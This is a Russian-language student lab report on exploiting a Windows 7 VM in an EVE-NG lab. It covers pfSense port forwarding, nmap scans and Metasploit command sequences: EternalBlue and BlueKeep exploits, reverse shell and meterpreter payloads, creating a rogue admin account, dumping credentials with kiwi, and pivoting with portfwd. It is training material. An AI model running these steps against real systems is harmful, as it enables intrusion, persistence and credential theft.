Практика №3. Эксплутация уязвимостей. MetaSplot Framework === # Задание к практической работе №3 - Построить инфраструктуру в системе EVE-NG (есть возможность ее импортировать) - Настроить каждое устройство в соответсвии со следующими параметрами: - Kali-2021, Win-7, Win-10, Debian - получение адреса DHCP - На PfSense выполнить проброс с внешних 445/tcp и 3389/tcp портов на аналогичные порты win-7 виртуальной машины - Выполнить сканирование внешнего интерфейса межсетевого экрана с помощью nmap и Nessus с целью обнаружения уязвимых сервисов - Использую Metasploit Framework - получить доступ до Windows-7 виртуальной машины - Используя payload meterpreter: - выполнить создание нового пользователя - Выполнить скриншот рабочего стола - получить все учетные записи, находящиеся в памяти системы - Выполнить проксирование трафика во внутреннюю инфраструктуру ### **`Выполнение задания`** - Построить инфраструктуру в системе EVE-NG (есть возможность ее импортировать) ![](https://i.imgur.com/RXYNgdc.png) - Настроить каждое устройство в соответсвии со следующими параметрами: - Kali-2021, Win-7, Win-10, Debian - получение адреса DHCP Включим pfsense и switch: ![](https://i.imgur.com/PvtG4Rk.png) **Debian** Выведим информацию о сетевых интерфейсах и их свойствах на **дебиан** командой `ip a` ![](https://i.imgur.com/Wexw1ZE.png) Запросим IP-адрес от DHCP-сервера командой `dhclient ens3` после чего убедимся в получении адреса снова выполнив команду `ip a`: ![](https://i.imgur.com/tXoxAuB.png) **Kali** Проведем аналогичную операцию с Kali: ![](https://i.imgur.com/9ztLLcg.png) **Win-10** Проверим полученный IP-адрес командой `ipconfig`: ![](https://i.imgur.com/WkFvXAF.png) **Win-7** Проведем аналогичную операцию с Win-7: ![](https://i.imgur.com/h0N7wYl.png) - На PfSense выполнить проброс с внешних 445/tcp и 3389/tcp портов на аналогичные порты win-7 виртуальной машины Разрешим проброс портов, перейдя в интерфейс pfsence через 192.168.1.1 ![](https://i.imgur.com/CND4Wob.png) Разрешим подключения от компьютеров: ![](https://i.imgur.com/sUsKNtl.png) Просканируем порты, команда `nmap 192.168.198.0/24 -O` (параметр -O в данном случае используется для определения операционной системы устройств в сети, чтобы точно убедиться, что мы обращаемся к нужной машине): ![](https://i.imgur.com/5cpcx9J.png) (или же можно было `nmap 192.168.198.1`): ![](https://i.imgur.com/oUsuPOu.png) (или `sudo nmap 192.168.198.1 -p445,3389 -A`) - Выполнить сканирование внешнего интерфейса межсетевого экрана с помощью nmap и Nessus с целью обнаружения уязвимых сервисов Откроем pfsense ![](https://i.imgur.com/0o8hjdI.png) Просканируем внешний IP с помощью `nmap`: ![](https://i.imgur.com/nkBKAxg.png) - Использую Metasploit Framework - получить доступ до Windows-7 виртуальной машины Воспользуемся эксплоитом `EternalBlue` `sudo msfconsole` `search ms17-010` `use 0` (номер eternal_blue) `show options` `show targets` (`set target [id]`) (в моем случае 2) (`set ForceExploit true`) `set rhost 192.168.198.135` (ip pfsense) `run` ![](https://i.imgur.com/B50Yy6r.png) - Используя payload meterpreter: - выполнить создание нового пользователя `sudo msfconsole` `search bluekeep` `use 1 (bluekeep_rce)` `set payload windows/x64/shell/reverse_tcp` `run` `chcp 65001` - смена кодировки ![](https://i.imgur.com/F0odXca.png) Создание нового пользователя "test" с паролем "eve@123" в качестве админа: ![](https://i.imgur.com/rFkVHxv.png) Проверка, что админ под логином "test" создался: ![](https://i.imgur.com/AM7qBOT.png) - Выполнить скриншот рабочего стола Воспользуемся эксплоитом `BlueKeep` `sudo msfconsole` `search bluekeep` `use 1 (bluekeep_rce)` `show options` (`set target [id]`) (в моем случае 2) (`set ForceExploit true`) `set rhost 192.168.198.135` (ip pfsense) `run` Удалось захватить экран ![](https://i.imgur.com/keSHEOC.jpg) Собственно, можно сохранить скриншот, например, текущий находится по этому пути: ![](https://i.imgur.com/OPspOYk.png) - получить все учетные записи, находящиеся в памяти системы `sudo msfconsole` `search bluekeep` `use 1 (bluekeep_rce)` `set payload windows/x64/meterpreter/reverse_tcp` (`set target [id]`) (в моем случае 2) (`set ForceExploit true`) `set rhost 192.168.198.135` (ip pfsense) `run` `load kiwi` `creds_all` ![](https://i.imgur.com/XeskPdu.png) ![](https://i.imgur.com/110bAwZ.png) ![](https://i.imgur.com/V2rXs3V.png) иной способ: меньше инфы: `sudo msfconsole` `search bluekeep` `use 1 (bluekeep_rce)` `set payload windows/x64/shell/reverse_tcp` (`set target [id]`) (в моем случае 2) (`set ForceExploit true`) `set rhost 192.168.198.135` (ip pfsense) `run` `chcp 65001` - смена кодировки `query user` ![](https://i.imgur.com/IY6oRm5.png) - Выполнить проксирование трафика во внутреннюю инфраструктуру `sudo msfconsole` `search bluekeep` `use 1 (bluekeep_rce)` `set payload windows/x64/meterpreter/reverse_tcp` (`set target [id]`) (в моем случае 2) (`set ForceExploit true`) `set rhost 192.168.198.135` (ip pfsense) `run` Ввводим: `portfwd add -L 192.168.198.133 (<-- kali ip) -l 2323 (<-- random port)` `-p 443 -r 192.168.1.1 (<-- local pfsense ip)`: ![](https://i.imgur.com/zAZrqm9.png) Переходим по адресу `https://192.168.198.133:2323`: ![](https://i.imgur.com/Rt2vH7m.png)